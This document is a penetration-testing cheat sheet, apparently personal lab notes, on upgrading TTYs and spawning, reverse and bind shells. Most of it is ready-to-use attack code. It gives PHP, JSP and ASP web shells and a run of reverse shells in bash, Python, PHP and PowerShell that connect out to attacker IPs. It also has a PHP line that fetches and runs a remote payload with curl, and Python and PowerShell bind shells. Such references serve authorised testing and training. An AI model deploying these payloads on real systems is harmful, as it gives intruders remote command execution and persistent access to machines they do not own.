Shells/TTYs

Teletypewriters and Shells

TTYs

• You can use the rlwrap utility to enable line editing and history:

Listener

rlwrap nc -lvnp <port>

Connect to the target

rlwrap nc 10.10.10.131 6200

• In order to have a full TTY follow this steps:

BASH:

1. python3 -c 'import pty; pty.spawn("/bin/bash")'

2. CTRL+Z

3. stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

ZSH:

• Same first two steps and then:

stty raw -echo; fg %1; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

---

Use arrow-keys

• Use bash:

bash

• Turn history on:

set -o history

• In the .bashrc file, make sure HISTSIZE is not set to 0:

# for setting history length see HISTSIZE and HISTFILESIZE in bash
HISTSIZE=1000
HISTFILESIZE=1000

---

Clear Terminal

• Set the environmental variable from the terminal to xterm:

export TERM=xterm

---

Terminal Size

• Before check the size of your terminal outside the remote shell to have a reference:

stty size

• Now you can set it up as you desired to work more comfortably:

stty rows <NUMBER> columns <NUMBER>

---

Spawning Shells

• The pty module in Python allows you to spawn a new process in a pseudo-terminal, effectively creating an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/sh")' 

• The script command starts a shell session and records the session to a file. /dev/null is specified as the file where the session is "recorded", but since it's /dev/null, no logging actually happens:

script -qc /bin/bash /dev/null

• Uses echo to pass the Python command os.system('/bin/bash') to the Python interpreter:

echo os.system('/bin/bash') 

• Spawn an interactive shell directly from the terminal:

/bin/sh -i

• The command exec "/bin/sh" tells Perl to replace the running Perl process with a new /bin/sh shell:

perl -e 'exec "/bin/sh";'

• This is similar to the previous example, but without the -e flag used directly from the command line. It represents Perl code where the exec function is used to spawn a shell:

perl: exec "/bin/sh";

• Ruby's exec function, like in Perl, replaces the current process with a new process—in this case, /bin/sh:

ruby: exec "/bin/sh"

• Runs a shell command from Lua, but unlike in Perl or Ruby, this does not replace the current process. It runs /bin/sh as a child process:

lua: os.execute('/bin/sh')

• Replaces the current Ruby interpreter (IRB) with the shell:

exec "/bin/sh";

• Used to execute an external shell command:

:!bash

• Changes the default shell used by vim's :! command:

:set shell=/bin/bash:shell

• Spawn a shell from within the nmap interface, enabling the execution of additional shell commands while scanning:

!sh

---

PSY

• PSY Shell is an interactive PHP REPL (Read-Eval-Print Loop) used normally for debugging.

---

Useful Commands:

Very handy

help

Print the working directory

getcwd()

Print the current user

get_current_user()

Print system info

phpinfo()

Print contents from directory

scandir("/home")

Print content from file

file_get_contents("/etc/os-release")

• If there are break line characters like /n and you want to get ride of then:

echo file_get_contents("home/nairobi/ca.key")

---

Web Shells

PHP

Standard shell

<?php system($_REQUEST['cmd']); ?>

Create cmd.php

echo '<?php system($_REQUEST['cmd']); ?>' > cmd.php

---

JSP (Java Server Pages)

Standard shell

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

---

ASP (Active Server Pages)

Standar shell

<% eval request("cmd") %>

---

Reverse Shells

BASH Reverse Shells

Standard Shell

bash -i >& /dev/tcp/10.10.14.18/1337 0>&1

Uses FIFO

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

FIFO URL Encoded

rm%20/tmp/f%3B%20mkfifo%20/tmp/f%3B%20cat%20/tmp/f%20%7C%20/bin/sh%20-i%202%3E%261%20%7C%20nc%2010.10.16.10%204444%20%3E%20/tmp/f

Run it in the background

nohup bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1" &

Use the URL parameter

bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/9001+0>%261'

---

Python Reverse Shells

One liners

Uses pty

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.6",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Uses subprocess

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Create the shell file

Uses pty

echo 'import pty
import socket
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.6", 4444))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn("/bin/bash")
s.close()' > shell.py

Uses subprocess

echo 'import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.157", 1235))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
subprocess.call(["/bin/sh", "-i"])
s.close()' > shell.py

Uses UDP

import os
os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.16.10 4444 >/tmp/f &").read()

---

PHP Reverse shell:

Direct reverse shell

<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.17/4444 0>&1'");?>

• Fetches and executes a remote reverse shell via curl:

<?php system("curl http://attacker_ip/reverseshell | bash"); ?>

Pipe Shell

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <Port> >/tmp/f"); ?>

Powershell Reverse shell:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

---

Bind Shells

• First, find ports were inbound connections are allowed:

Linux

ss -tuln
netstat -tuln
lsof -i -n

---

Windows

netstat -ano | findstr "LISTEN"
Get-Process | Where-Object {$_.Id -eq (Get-NetTCPConnection | Where-Object {$_.State -eq 'Listen'}).OwningProcess}

Check firewall rules

netsh advfirewall firewall show rule name=all

---

Python Shell

python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

Powershell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();